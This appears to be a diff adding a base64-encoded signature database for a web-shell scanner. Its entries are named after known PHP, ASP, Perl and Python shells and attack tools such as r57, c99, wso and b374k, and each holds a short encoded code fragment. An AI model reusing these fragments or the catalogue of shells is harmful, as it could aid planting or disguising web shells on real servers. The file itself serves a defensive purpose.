+aHNhVzVMS0NKelpVTTlhR1Y0Sm1acGJFVTlKR1p1Sm5kdmNtdHBibWRrYVZJOUpHTjNaQ0lwTGlK
+Y0lqNUlaIjtzOjE3OiJqYWNrYWxbMl1bMF1bcGhwXSI7czo2NDoiTm1KallXSTBOVE15WldJNE5U
+UmxJQTBLSkdOdmJHOXlJRDBnSWlNd01FWkdOallpT3drdkwwTnZiRzkxY2cwSyI7czoyMDoiZmls
+ZXNtYW5bMTFdWzBdW3BocF0iO3M6NjQ6IjZJRVpCVEZORk95QjlEUXBtZFc1amRHbHZiaUJuWlhS
+a2FYTm1kVzVqS0NrZ2V5QWtjbVY2SUQwZ1pYaHdiRzkiO3M6MTk6ImlwYXlzNzc3WzBdWzBdW3Bo
+cF0iO3M6NjQ6Ikhka1dqUkZMMWx2ZUZVd2NtOVFVRmhqUjBSR2MzRkVhR0ppVVdwU1pWRmlTVzVz
+SzBSemFuSkdaVkF5TVN0cVYiO3M6MjA6InBocHNoZWxsWzI0XVswXVtwaHBdIjtzOjY0OiJ6SUhk
+cGRHZ2dkWE5sY2pvZzNzZkc0K1VneCtIajVzZmUyaURqMmlESDArTWc3ZWJTMGNmSzVjYzhMMlp2
+Ym5RIjtzOjE4OiJzeW1saW5rWzBdWzBdW3BocF0iO3M6NjQ6Imx4dUlqc05DZ2tKWldOb2J5QWlQ
+QzkwY2o1Y2JpSTdEUW9KZlEwS0RRb0paV05vYnlBaVBDOTBZV0pzWlQ0aU8iO3M6MTY6Im15c3Fs
+WzldWzBdW3BocF0iO3M6NjQ6ImgwV0ZneWNsRnVabEJYY1ZaYU1HVnpTR2x0UkhJeVpHdHRLelYz
+WW1wdWFqSnFVbnB2Um1KYVVubE1ha1ZzUTIiO3M6MjA6InBocHNoZWxsWzI1XVswXVtwaHBdIjtz
+OjY0OiJUWEJQZHowOUlqc2dEUXBsZG1Gc0tHSmhjMlUyTkY5a1pXTnZaR1VvSkdsdWFtSjFabVlw
+S1RzTkNpOHFJR041IjtzOjE1OiJ3c29bMThdWzBdW3BocF0iO3M6NjQ6Ik5HUmtaR1JrWWlJRzl1
+UTJ4cFkyczlJbVJ2WTNWdFpXNTBMbWRsZEVWc1pXMWxiblJDZVVsa0tDZDBZMjlzYjMiO3M6MjA6
+ImNvbnN0YW5jZVswXVswXVtwaHBdIjtzOjY0OiI3ZTQ2UEdKeVBqeDBaWGgwWVhKbFlTQnliM2R6
+UFRnZ1kyOXNjejA0TUQ0aUxtSmhjMlUyTkY5bGJtTnZaR1VvIjtzOjE5OiJuaXhzaGVsbFswXVsw
+XVtwaHBdIjtzOjY0OiJJRzkxZEhObGREc0tRazlTUkVWU0xVeEZSbFE2SUNBZ0l6azNRekk1TmlB
+eGNIZ2diM1YwYzJWME93cENUMUpFIjtzOjE0OiJyNTdbMV1bMF1bcGhwXSI7czo2NDoialFDWitM
+RkJRTmtkRUxHc25PSDVQVnl3NmJUWkFJMEFtZm40c1VINVFMSDU0YlRwdWVFczBUR2t5WGxkRFRt
+TiI7czoxNjoiZWZzbzJbMF1bMF1bYXNwXSI7czo2NDoiMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZV
+azlQVkNkZElEMGdjM1J5WDNKbGNHeGhZMlVvSUNkY1hDY3NJQ2N2SiI7czoyNToicGhwZmlsZW1h
+bmFnZXJbNV1bMF1bcGhwXSI7czo2NDoiVjFrMFpsUjFRazlTYzI5YWIwOHlUekJZZFdVclFWQjNU
+a1pYWlhSQ1RVNVdUVzVESzBkc1JHbGhSMEZrWldGTCI7czoyMDoiYWwtbWFyaHVtWzFdWzBdW3Bo
+cF0iO3M6NjQ6IjJhbEZHZFRrM2ExWTBTVFJhYmsxdFRXdHhRamRDZW1SM1ZtOURibE5aVkdkRVRU
+aFpOME5tVkhsaVVWTmxNMGQiO3M6MjA6ImZpbGVzbWFuWzE4XVswXVtwaHBdIjtzOjY0OiJYSnli
+M0lvSWs1dklHTnZibVpwWjNWeVlYUnBiMjRnWm1sc1pYTWdabTkxYm1RaElpazdDaUFnSUNCOUlH
+VnNjIjtzOjE3OiJ0ZWFtcHNbMF1bMF1bcGhwXSI7czo2NDoid0EvQUQ4QVB3QWdBRDhBUHdBL0FE
+OEFQd0EvQUQ4QVB3QS9BRDhBUHdBZ0FDY0FJd0FuQUNrQUlnQXNBQUFOQyI7czoyMToicmVtb3Rl
+dmlld1syXVswXVtwaHBdIjtzOjY0OiIxWlQwek1qNUJjbU5vYVhabElpa0tjbVZ6Y0c5dWMyVXVk
+M0pwZEdVb0lqeGljajQ4YVc1d2RYUWdkSGx3WlQxIjtzOjIyOiJlbG1hbGlzZWtlclsxXVswXVt2
+YnNdIjtzOjY0OiIyNXNiMkZrWENJK1BDOW1iM0p0UGp3dlpHbDJQaUk3Q2dvS0NtVmphRzhnSWp4
+a2FYWStQRVpQVWswZ2JXVjBhIjtzOjE5OiJ3ZWJzaGVsbFsyXVswXVtwaHBdIjtzOjY0OiJjRTk1
+UW14Wk1taDJTVU5qT0V3elVteGxTRkpvWTIxV2FGQnBZemRtVVRCTFdsZE9iMko1UVc1UVIxcDJZ
+MjB3IjtzOjIzOiJzaW1wbGVfc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoibnBzYVdJNkx5OGlMaVJt
+YVd4bExDQWtkR1Z0Y0NrcGV3b2tlbkp2Wkd4dklEMGdabTl3Wlc0b0pIUmxiWEFzSSI7czoxOToi
+c2FmZW1vZGVbMF1bMF1bcGhwXSI7czo2NDoiQmpiVFZPVFRGQmRsSnJTbGRoU0VwUkRRcFVlbXh6
+VG10c01HSXpiREJOU0d4dldqSnpjbGRJYTNaV01HUjNUayI7czoxNzoic2VtcGFrWzBdWzBdW3Bo
+cF0iO3M6NjQ6Ik5FYUZwQmNsSnBTak12SzA5U1JXWTBLMjFRYWpReFdFVmlOa1V4VGpWdlQzWm1j
+Rm94YWpGdFUyNDFiSHAyVmwiO3M6MjU6InNoZWxsX3VwbG9hZGVyWzJdWzBdW3BocF0iO3M6NjQ6
+IkNpQWdJQ0FsUGlBOEwyWnZiblErUEM5a2FYWStDaUFnSUNBZ0lEd3ZkR1ErQ2lBZ0lDQThMM1J5
+UGdvZ0lDQWciO3M6MjY6InBvd2VyZHJlYW1zaGVsbFswXVswXVthc3BdIjtzOjY0OiJJbFZ1WVhO
+emFXZHVaV1FpT3dvS0pIQnZjblJiTmpGZElEMGdJazVKSUUxQlNVd2lPd29LSkhCdmNuUmJOakpk
+IjtzOjI5OiJuZXR3b3JrZmlsZW1hbmFnZXJbMF1bMF1bcGhwXSI7czo2NDoicWNVcFlSVkozVjFK
+emFUSjVjM1ZNVjBFeGRGaHhiWGROTW14R2FFUlZPV2RyY1dsaFJITnViRW8zZEV4R1lqSiI7czox
+NToicjU3WzEyXVswXVtwaHBdIjtzOjE5NDoiWmpObW1UTm16RE5tL3pPWkFET1pNek9aWmpPWm1U
+T1p6RE9aL3pQTUFEUE1NelBNWmpQTW1UUE16RFBNL3pQL0FEUC9NelAvWmpQL21UUC96RFAvLzJZ
+QUFHWUFNMllBWm1ZQW1XWUF6R1lBLzJZekFHWXpNMll6Wm1Zem1XWXp6R1l6LzJabUFHWm1NMlpt
+Wm1abW1XWm16R1ptLzJhWkFHYVpNMmFaWm1hWm1XYVp6R2FaLzJiTUFHYk1NMmJNWm0iO3M6MTU6
+ImNtZFsxM11bMF1bcGhwXSI7czo2NDoidUozUWdjMlYwSUhSb2FYTWdkRzhnWVNCMlpYSjVJR3ho
+Y21kbElIWmhiSFZsTGlCVWFHbHpJR2x6RFEwS0NRayI7czoxOToiY2dpdGVsbmV0WzBdWzBdW3Bs
+XSI7czo2NDoiV3gwWWk5bGRuWnViWEZ1TkhRdk9VUkZOSEF3ZG1SWUwzWjBhMDEyTVM5d1ZpQmxJ
+Q0l1SW5naUxpSXJJaTRpZSI7czoxOToiZmlsZXNtYW5bNl1bMF1bcGhwXSI7czo2NDoiUXhNRGNu
+UFQ0bngrSGo1dGJtMmljc0RRb25aVzVuWDJKMWRIUXhOU2M5UGlmRjBkUEg0U2NzRFFvblpXNW5Y
+MyI7czoyMjoic25pcGVyc2hlbGxbMl1bMF1bcGhwXSI7czo2NDoia1k3Q2lBZ1ltRmphMmR5YjNW
+dVpEb2dJMFl3TURzS2ZRb0tMbVZ1ZEhKcFpYTWdld29nSUdKdmNtUmxjam9nTSI7czoyMDoiZ2Ft
+bWFzaGVsbFswXVswXVtwbF0iO3M6NjQ6IkhoMEp5azdEUXBsZUdWaktDZGpaQ0F2ZEcxd08wZEZW
+Q0JvZEhSd09pOHZiR1YwZEc5eVpTNXdiQzltYVd4bEwiO3M6MjU6InNoZWxsX3VwbG9hZGVyWzdd
+WzBdW3BocF0iO3M6NjQ6ImxoWW14bElFNWhiV1U4TDBJK1BDOW1iMjUwUGp3dmNENEtJQ0FnSUNB
+Z1BDOVVSRDRLSUNBZ0lEeFVSQ0IzYVciO3M6MjA6InZhcmlhYmxlc1swXVswXVthc3BdIjtzOjY0
+OiJHeHZZV1JsWkY5bWFXeGxLQ1JmUmtsTVJWTmJKM0J5YjJKbEoxMWJKM1J0Y0Y5dVlXMWxKMTBz
+SUNJdUwyUnBiIjtzOjE5OiJuY2NzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJrdE1Uc0tJQ0FnSkdW
+NGRDQTlJQ1JsZUhSYkpHTmRPd29nSUNBa1pYaDBJRDBnYzNSeWRHOXNiM2RsY2lna1pYIjtzOjE5
+OiJwaHBzaGVsbFs2XVswXVtwaHBdIjtzOjY0OiJUR2hXVDJwR0lpd2laRTlqWmxGcFkyTklZMFk1
+TVRadk9YTklPR2RLYm5neFRtTlNaV054VnpKdmNYTXZVWGxIIjtzOjI1OiJzaGVsbF91cGxvYWRl
+clszXVswXVtwaHBdIjtzOjY0OiIwVlNWa1ZTV3lkSVZGUlFYMGhQVTFRblhTNGlMMXdpUG1oMGRI
+QTZMeThpTGtBa1gxTkZVbFpGVWxzblNGUlVVIjtzOjIwOiJwaHBzaGVsbFsyOF1bMF1bcGhwXSI7
+czo2NDoiWW05MGRHOXRiV0Z5WjJsdVBTSXdJaUJ0WVhKbmFXNTNhV1IwYUQwaU1DSWdiV0Z5WjJs
+dWFHVnBaMmgwUFNJdyI7czoxNzoic2luY2FwWzBdWzBdW3BocF0iO3M6NjQ6IklDQWdJQ0FnZEhK
+NU9nb2dJQ0FnSUNBZ0lDQWdJQ0JqYUdsc1pGOXpkR1JwYml3Z1kyaHBiR1JmYzNSa2IzVjAiO3M6
+MjA6ImNnaS1weXRob25bMF1bMF1bcHldIjtzOjY0OiJIT0dsaFUzcDBhSEpYZW1oVVNuVTRjMmsx
+U1drM09EVXJkblpyU2xsTWIyVjFPR0p5ZGt0b1p6RmlaVkZOVlROIjtzOjE0OiJjbWRbNl1bMF1b
+cGhwXSI7czo2NDoiWlVVSG95UVhSS1ZIQmtUVkZUVTFObFJ6aDZRelZ5YUdoUWQwOXRkM0UxYXl0
+b1ZIUnBXV0ZRVkV4QlNYZFhTMiI7czoyMDoiY29uZmlnc3B5WzRdWzBdW3BocF0iO3M6NjQ6Ilp5
+QnpJRDBnYzNSdGNtUnlMbEpsWVdSVWIwVnVaQ2dwT3cwS2MzUnRjbVJ5TGtOc2IzTmxLQ2s3RFFw
+eVpYUjEiO3M6MTY6ImNtZFsxN11bMF1bYXNweF0iO3M6NjQ6IjJWN0lIVnVjMlYwS0NSdldIbGhj
+VzFJYjBOb2RraFJSa04yVkd4MWNXMUJRMXNuYVc1bWJ5ZGRXeWRtWVdsc0oiO3M6Mjg6IndvcmRw
+cmVzc19leHBsb2l0WzBdWzBdW3BocF0iO3M6NjQ6Ik56WVdkbEtUc0tmUXByY2tsU0tFRllVMkpp
+TGxaaGJIVmxLVHNLZlFwd2RXSnNhV01nZG05cFpDQm5URXRqS0giO3M6MjA6InFSZXlGdVJ0WzBd
+WzBdW2FzcHhdIjtzOjY0OiJDSThabTl1ZENCemFYcGxQU2N4SnlCamIyeHZjajBuSXprNU9UazVP
+U2MrUkc5dWRDQnBiaUIzYVc1a2IzZHpJIjtzOjIyOiJzaW1hdHRhY2tlclswXVswXVtwaHBdIjtz
+OjY0OiJXOXRlbVoyU21weFZsWkZaM1IxWjIxRWVVRXdZbTFDV0RGd1VWTkJPVWxFYW5FNGIwaHRl
+VnAzVFRsbmMySm5WIjtzOjE1OiJjOTlbMjhdWzBdW3BocF0iO3M6NjQ6IllXSnNaWE1vSUNSa1lt
+NWhiV1VnS1RzTkNnMEtDV2xtS0NBa2NGUmhZbXhsSUQwOUlEQWdLU0I3RFFvSkNTUnQiO3M6MTY6
+Im15c3FsWzhdWzBdW3BocF0iO3M6NjQ6Ik9WQ0JEVDB4UFVqMVNSVVErWTIxa09qd3ZSazlPVkQ0
+bkxpUjBZaTArYldGclpYTmxiR1ZqZENoaGNuSmhlU2ciO3M6MTY6InRyeWFnWzBdWzBdW3BocF0i
+O3M6NjQ6IkE2SUNSa2FYTm1kVzVqUFRBcE93MEtLSE4wY25SdmRYQndaWElvYzNWaWMzUnlLRkJJ
+VUY5UFV5d2dNQ3dnTXkiO3M6MjE6ImZhdGFsc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiTmxMbkIz
+WkNJK1JtbHVaQ0J6WlhKMmFXTmxMbkIzWkNCbWFXeGxjeUJwYmlCamRYSnlaVzUwSUdScGNtVmpk
+RyI7czoxNDoiYzk5WzVdWzBdW3BocF0iO3M6NjQ6Imt0UGNuaFVWUzlMVVdWMlVTSXNJbXhHZDBO
+bVZXOWtjMVkyZW5od00wczBaakJsUmxndmJITkZJaXdpVWpGVlkiO3M6MjA6InBocHNoZWxsWzEz
+XVswXVtwaHBdIjtzOjY0OiJJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl3b2pNRG9n
+VG04Z2NISnZkR1ZqZEdsdmJqc2dZVzU1IjtzOjIwOiJnMDBuc2hlbGxbMF1bMF1bcGhwXSI7czo2
+NDoiVDRLUEhSeVBnb2dJRHgwWkNCM2FXUjBhRDBpTlRBbElpQm9aV2xuYUhROUlqZ3pJaUIyWVd4
+cFoyNDlJblJ2YyI7czoxODoid2Fja2luZ1sxXVswXVtwaHBdIjtzOjY0OiIxbExkeXMzVkRWUVZu
+ZE9la2hZVTNGUGFubDFUREZqUkhoTmVHY3pkRGRZTTJOVVEyRlRlbGQwVkVGVlNDOHJaIjtzOjE4
+OiJtaWxkbmV0WzBdWzBdW3BocF0iO3M6NjQ6IkhROU1TQjJZV3hwWjI0OWRHOXdQanhVUVVKTVJT
+Qm9aV2xuYUhROU1TQmpaV3hzVTNCaFkybHVaejB3SUdObGIiO3M6MTk6ImdueXNoZWxsWzFdWzBd
+W3BocF0iO3M6NjQ6ImNtMXpXeUozSWwxYkluSWlYVDhpSUdOb1pXTnJaV1FpT2lJaUtTNGlQaUJT
+WldGa1BHSnlQbHh1SWk0TkNpQWciO3M6MjI6IkZhVGFMaXNUaUN6WzZdWzBdW3BocF0iO3M6NjQ6
+ImlJSE4wZVd4bFBTSm1iMjUwTFhOcGVtVTZNVEJ3ZENJK1BHSStVMkZtWlNCTmIyUmxJRTlPUEM5
+aVBqd3ZabTkiO3M6MjA6InJvb3RzaGVsbFsxXVswXVtwaHBdIjtzOjU0NzoiYmI6WEhnMk5WeDRO
+elpjZURZeFhIZzJRMXg0TWpoY2VEWTNYSGczUVZ4NE5qbGNlRFpGWEhnMk5seDROa05jZURZeFhI
+ZzNORng0TmpWY2VESTRYSGcyTWx4NE5qRmNlRGN6WEhnMk5WeDRNelpjZURNMFhIZzFSbHg0TmpS
+Y2VEWTFYSGcyTTF4NE5rWmNlRFkwWEhnMk5WeDRNamduTjFneGNtVTVjeko2TDBSdU9WWmpkMjFx
+WmxweEsxQlpWSFIxTjNNeVRXNWhVVFYwTW1wVWNHTjFaM0EyWlZCS2MyMTRjbXRUTVZCcmRVNXJW
+MlkzTjBNMFEydFNSWEY1TkROVE56TTRUakYyWW5WbWNEZEdTVVZCVWtwclFWSkNRVWhVTjNoU1Zt
+NU9TV3gxYVRSWVR6WmtOMHA0TnpKVVF5OVFUakprYlVoNmFtdzRaR0phWmpkNE1tUnRaRGxMU2xo
+aVNFTjBVRkZEWWxsSWVtcG5TMWRaZEZwUlYwUmtSbTh6V0hacUwzZElTMUJOYWtaT2RrZHJlbmQ0
+TDNaVWJ6RmtLMmhNT1dOeE1rMUdPWFJET1dSblREZ3ZSMHRPWlRnMFRpOXFjWGhTYkRCUVJXdDBU
+alYyWVV4ck9FRmFaRVZhVjFwQkswdzFjSEpLUzNOM1pGUlVlUzgxZUZST2RqZ3llVmR0TUVvNGMz
+Y3hSbmhOWm05SVdHOVhSREJ1UzBZPSI7czoxOToiZmlsZXNtYW5bNV1bMF1bcGhwXSI7czo2NDoi
+bTkxY0R3dllqNGlPMzBOQ2lBZ0lDQWdJQ1J5YjNkYlhTQTlJQ0k4WWo1UVpYSnRjend2WWo0aU93
+MEtJQ0FnSSI7czoyMjoiRmFUYUxpc1RpQ3pbMl1bMF1bcGhwXSI7czo2NDoiMlBTUmZVa1ZSVlVW
+VFZGc25jM1ZpYldsMGRpZGRPdzBLSkcxbGRHaHZaRDBrWDFKRlVWVkZVMVJiSjIxbGRHaCI7czoy
+MToiY3liZXJzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJ5Y3BMbTl1S0NkbWIyTjFjeWNzSUdaMWJt
+TjBhVzl1S0dVcGV3b0pDV0Z5WjNNZ1BTQWtLQ2NqWlhaaGJFRnlaIjtzOjE3OiJiMzc0a1sxNV1b
+MF1bcGhwXSI7czo2NDoiUjBkQk55OW9aR3A0WWxrd1pXaENXbmRGVEZsb09UWXdhVWxETlV0NFNG
+aEVRWEJLVlVZdk1ITkRTRnA1Y1hKaSI7czoxNjoiYjM3NGtbMV1bMF1bcGhwXSI7czo2NDoiakVw
+TGlJckpIWmlOR0U0T0RReE4xeHVJanNnZlNCOUlHWjFibU4wYVc5dUlHNWxOalkzWkdFM05pZ2tk
+amsxTiI7czoyMDoicGhwc2hlbGxbMjldWzBdW3BocF0iO3M6NjQ6IlNraHJWMU5QTDFWTU5GQTJV
+U3RyVjFaaU1EUkRNMFJOTDBoM2FucG1Na0pNVFV4eWJubzBaRWxXYzBscU1pY3MiO3M6MjA6InBo
+cHNoZWxsWzEyXVswXVtwaHBdIjtzOjY0OiJnSUNjc0NpZHlkVjlpZFhSME15Y2dQVDRuSUNBZ0lD
+QWdJQ2NzQ2lkeWRWOTBaWGgwTVRJblBUNG5ZbUZqYXkxIjtzOjE1OiJyNTdbMTVdWzBdW3BocF0i
+O3M6NjQ6InVSRlZRUTJWUVNIQndjazV5YTJnM056Uk1SRko0UlhaTVltaE5WRVk1V0VwVmRWQkdh
+M3BhU2xoWmVWWkNhVmgiO3M6MTU6ImNib3RbMF1bMF1bcGhwXSI7czo2NDoiSlRFVlRXeWRwYldG
+blpTZGRXeWR1WVcxbEoxMDdJQ1IxYzJWeVptbHNaVjkwYlhBZ1BTQWtYMFpKVEVWVFd5ZCI7czoy
+Njoic2hlbGxfdXBsb2FkZXJbMTldWzBdW3BocF0iO3M6NjQ6IkNBZ0lDQWdJQ0FnSUNBZ0lDQWdJ
+Q0FnWld4elpRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSHNLSUNBZ0kiO3M6MTY6ImRldmls
+WzBdWzBdW3BocF0iO3M6NjQ6IldGck93b0tJQ0FnSUdOaGMyVWdJbWQ2WkdWamIyUmxJam9LSUNB
+Z0lDQWdhV1lnS0dselgyWnBiR1VvSkZCaGQiO3M6MTk6InNyb3NoZWxsWzBdWzBdW3BocF0iO3M6
+NjQ6Im1RMjl5TUhGeFNFUmlkRFppTUZWdFJWbDRUa1ZpWkVNclFuTXhPSFJtZUV4a1UxQjRSVTFT
+Y1dKa1FtOXJUR1kiO3M6MjY6InNoZWxsX2NvbW1hbmRlclswXVswXVtwaHBdIjtzOjY0OiJwcU9F
+MUZZVTlaVFU4NFRVSlhPVVF3VERSYWRrbzVNMjFaWVhOaldWaFFibFZJWW1KV00xaE1SMEl2ZUhK
+aWVrIjtzOjE3OiJiMzc0a1sxNl1bMF1bcGhwXSI7czo2NDoicGJtZGthVzVuY3lBeklpQnphWHBs
+UFNJMUlqNDhMMlp2Ym5RK1BHSStRbmx3WVhOeklGTm9aV3hzSUV0MWJHeCI7czoxOToic2FmZW1v
+ZGVbNl1bMF1bcGhwXSI7czo2NDoibGFXWW9jM1J5ZEc5c2IzZGxjaWdrWTIxa0tTQTlQU0FpWVdK
+dmRYUWlLUW9KQ1hzS0NRa0pjSEpwYm5RZ0lrRiI7czoyOToiYWpheF9jb21tYW5kX3NoZWxsWzBd
+WzBdW3BocF0iO3M6MTM5OiJiYjpYSGd5TUZ3MU1seDRNbVpjTkRCY2VEWTFYREUyTmx4NE5qRmNN
+VFUwWEhneU9Gd3hOak5jZURjMFhERTJNbHg0TldaY01UWXlYSGcyTlZ3eE5qQmNlRFpqWERFME1W
+eDROak5jTVRRMVhIZ3lPRnd4TkROY2VEWTRYREUyTWx4NE1qaGNOVEE9IjtzOjIwOiJwaHBzaGVs
+bFsyN11bMF1bcGhwXSI7czo2NDoiV2JXUnNVakExUTJOcmN6SmtWVTQxVTIwd2Qxb3ljRlpYYXpG
+eldrVjRURTlHUmtKVE0wMHlXbXR3V0dGSFVuUiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMThdWzBd
+W3BocF0iO3M6NjQ6ImlidDlOTlFxeHdRQURzQVBEOXdhSEFnWlhaaGJDaGlZWE5sTmpSZlpHVmpi
+MlJsS0NkSlIxWnFZVWM0WjBsdWQiO3M6MTU6ImNtZFsxMl1bMF1bcGhwXSI7czo2NDoibU50VW5k
+amJWWjZZM2sxTUdWSVVXNUxWSE5PUTJsQlowbERRbnBsVnpGellWYzFja3REWTNaaFJ6bDBXbE00
+YiI7czoyMToiYnVja2V0aGVhZFswXVswXVtwaHBdIjtzOjY0OiI3SUFvZ0lDQWdJQ0FnSUdadmJu
+UXRabUZ0YVd4NU9pQlVaWEp0YVc1MWN5d2dSbWw0WldSemVYTXNJRVpwZUdWIjtzOjIzOiJmdWNr
+cGhwc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiWTJaellYWmxZMjl1ZEdWdWRENE5Danh3Y21VK0RR
+b2piWGxXWVhJakRRbzhMM0J5WlQ0TkNqd3ZZMlpwWmo0TiI7czoxNzoiY2ZleGVjWzBdWzBdW2Nm
+bV0iO3M6NjQ6IjFWclIwMUNlbU5hVDJJdmJEWkVNVWtuTENkd1UxZ3lNVTgyTDNjM2FqaGxWekJJ
+VW1kSmRHZEZNME5JWWtWTlkiO3M6MTk6InBocHNoZWxsWzldWzBdW3BocF0iO3M6NjQ6Im5aa1Z6
+VXdTME5TYTJKRGEzVktlVUo2WkZkT2FscFlUbnBKUTJOMVNraE9NVmt5VFhWS2VVSnRXVmRzYzBs
+RFkiO3M6MTc6InBocHNweVswXVswXVtwaHBdIjtzOjY0OiJBbUppQW9RR2x6WDNKbFlXUmhZbXhs
+S0NJa1pHbHlMeVJtYVd4bElpa3BJQ2tLSUFrSkNRbGxZMmh2SUdKMWFXIjtzOjE5OiJwaHBzaGVs
+bFswXVswXVtwaHBdIjtzOjY0OiJDbWxtSUNnaFpXMXdkSGtvSkhkdmNtdGZaR2x5S1NrZ2V3b2dJ
+QzhxSUVFZ2QyOXlhMlJwY2lCb1lYTWdZbVZsIjtzOjIzOiJheXlpbGRpel90aW1bMF1bMF1bcGhw
+XSI7czo2NDoia2MxYUdSSVNuQmxRMEU1U1VOUmVFOTVRVTVEYVVGblNVTkJaMGxEUVdkSlEwRm5T
+VWN4TlVsR2QydFpXRXB1UyI7czoxNToiYzEwMFsyXVswXVtwaHBdIjtzOjY0OiJTZ2tYME5QVDB0
+SlJWc25kaWRkS1NCaGJtUWdKRjlEVDA5TFNVVmJKM1luWFQwOUoyUW5LWHNLSUNBS0lDQnBaIjtz
+OjIzOiJzaW1wbGVfc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiNU1XVzFXVTJNeWJHOWtSVVY1V214
+b00xRlZXVEZPYXpWSlpXMUtlazlYVmxaTmJFNUhUbWwwVGljdUNpZGlWWCI7czoxNDoiZngwWzJd
+WzBdW3BocF0iO3M6NjQ6Ik1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlN
+akl5TWpJeU1OQ2lNZ1pIVnRjQ0IyWVgiO3M6MjM6ImluY2x1ZGVzaGVsbFswXVswXVtwaHBdIjtz
+OjY0OiJkQmFsQjVWbHAyVmtOQ1FtdFpTakl2TjBGNVEzWmlZMkUwU0U0M1NEbEpSM0ZyWTBKYVRH
+UXhhME5DUjBkRGIxIjtzOjI1OiJjb2NhY29sYV9zaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJCT1Ey
+MXNiVXRIYkhwak1sWXdTME5TWmxJd1ZsVlhlV1F3WWxoQmJsaFRhM0JFVVc5blpYY3dTMGxEUVdk
+UlNGIjtzOjE1OiJyNTdbMTNdWzBdW3BocF0iO3M6NjQ6IkM5RVNWWStQQzlVUkQ0OEwxUlNQZ284
+UHlCcFppZ2tZMmhrYVhJaFBXZGxkR04zWkNncEtYcy9QZ284VkZJK1AiO3M6MTY6ImR0b29sWzBd
+WzBdW3BocF0iO3M6NjQ6IlIwbEdPRGxoTVFvOFAzQm9jQ0FLWlhaaGJDaGlZWE5sTmpSZlpHVmpi
+MlJsS0NkaFYxbG5TMGRzZW1NeVZqQkwiO3M6MTU6ImNtZFsyNl1bMF1bcGhwXSI7czo2NDoiSXVK
+R2R5YjNWd1gzZHlhWFJsTGlJK1BDOW1iMjUwUGp3dmRHUStQSFJrSUdKblkyOXNiM0k5WENJalEw
+TkRRMCI7czoxNzoiYW5kcjNhWzBdWzBdW3BocF0iO3M6NjQ6IkJvY0UxNVFXUnRhVzR2SUZ4eVhH
+NGlPd29rWkdGMFlTQXVQU0lqSUdoMGRIQTZMeTkzZDNjdWNHaHdiWGxoWkciO3M6MTc6ImJhY2t1
+cFswXVsyXVtwaHBdIjtzOjY0OiJrWlNna1ptbHNaU2s3Q2lBZ0lDQWdhV1lnS0daMWJtTjBhVzl1
+WDJWNGFYTjBjeWdpWW1GelpXNWhiV1VpS1NrIjtzOjE5OiJzYWZlbW9kZVsyXVswXVtwaHBdIjtz
+OjY0OiI0bktUc0tDZ29nSUdWeWNtOXlYM0psY0c5eWRHbHVaeWhGWDFkQlVrNUpUa2NwT3dvZ0lH
+bHVhVjl6WlhRb0ltIjtzOjE1OiJlcm5lWzFdWzBdW3BocF0iO3M6NjQ6ImRqZHlVVzlzVG5ZMk5t
+NWlVRVU1VUhwdE1EZHVka1F4U1dJME1XaHpWVEZXU2pkVE1FVlJiazl5WkhaWGVpOWkiO3M6MjA6
+InBocHNoZWxsWzIyXVswXVtwaHBdIjtzOjY0OiJZMjFrV3pCZEtUc0tJQ0FnSUNBZ0lDQWdJQ1Iy
+YUc5emRDQTlJR1Y0Y0d4dlpHVW9Ja0FpTENSdWFXTnJXekZkIjtzOjIxOiJub2dyb2RwQm90WzBd
+WzFdW3BocF0iO3M6NjQ6InlkamIzQjVYMko1Y0dGemN5ZGRLU2tLSUNBZ0lDQWdJSHNLSUNBZ0lD
+QWdJQ0FnQ2lBZ0lDQWdJQ0FnSUNCcFoiO3M6MjE6Im11bGNpc2hlbGxbMF1bMF1bcGhwXSI7czo2
+NDoiOUN3MFlEUXNOQzgwTFhSZ3RHQU1pY3NDaWR5ZFY5MFpYaDBOekVuUFQ0aTBKTFJndEMrMFlE
+UXZ0QzVJTkMvMCI7czoxOToic3B5c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiM1JwYjI0Z2JHbHpk
+R2x1WnlBb0pHeHBjM1FwSUhzS0NXZHNiMkpoYkNBa1pHbHlaV04wYjNKNUxDQWthRzl0WiI7czox
+OToid2ViYWRtaW5bM11bMl1bcGhwXSI7czo2NDoibWtuTENkblR6bFRNSFZpU25sRldtVklTVzVZ
+V1VaTGRFRW5MQ2RoV21WalkyMVRVSGRyVVdGb2RrTXliazlrZCI7czoxOToicGhwc2hlbGxbN11b
+MF1bcGhwXSI7czo2NDoibU5DTWpZMmFsRmFOR1o1Y0hoTWJYVkdUMmhaYlZOdlZ6RlRUWFozZG5C
+MWR6bDBNbmxhZDFaWGVrMUxURXRLZSI7czoxOToib3Jic2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi
+WFUyZ3dVVkZFZERnNVprcGpkamhETnpRclJEWm9URFJTWW5kT2RrNVpOMU0xUjB4c1QwcGhkR0Y1
+UXpKemFqbCI7czoyMDoicGhwc2hlbGxbMThdWzBdW3BocF0iO3M6NjQ6IklpQjJZV3gxWlQxY0lp
+SXVKSE54YkhCaGMzTXVJbHdpSUM4K0RRb0pDUWtKQ1R4cGJuQjFkQ0IwZVhCbFBWd2kiO3M6MTY6
+ImIzNzRrWzldWzBdW3BocF0iO3M6NjQ6IjBSUmIyZEtSMngxWVdsQk9VbERVbVpWTUZaVFZtdFdV
+MWQ1U2xOU1ZrWldVbFpPVlZneFZsTlRVMHBrVDNjd1MiO3M6MjA6ImZpbGVzbWFuWzE3XVswXVtw
+aHBdIjtzOjY0OiIwWnpTVVF3WjBvd2JFOEtWVEJXVTFaRFFrcFViRkpRU1VOamRVcElVbWhaYlho
+c1RHbGpaMHREWTNWaFZ6RjNZIjtzOjE1OiJ3c29bMTZdWzBdW3BocF0iO3M6NjQ6ImJDQTlJQ1Jm
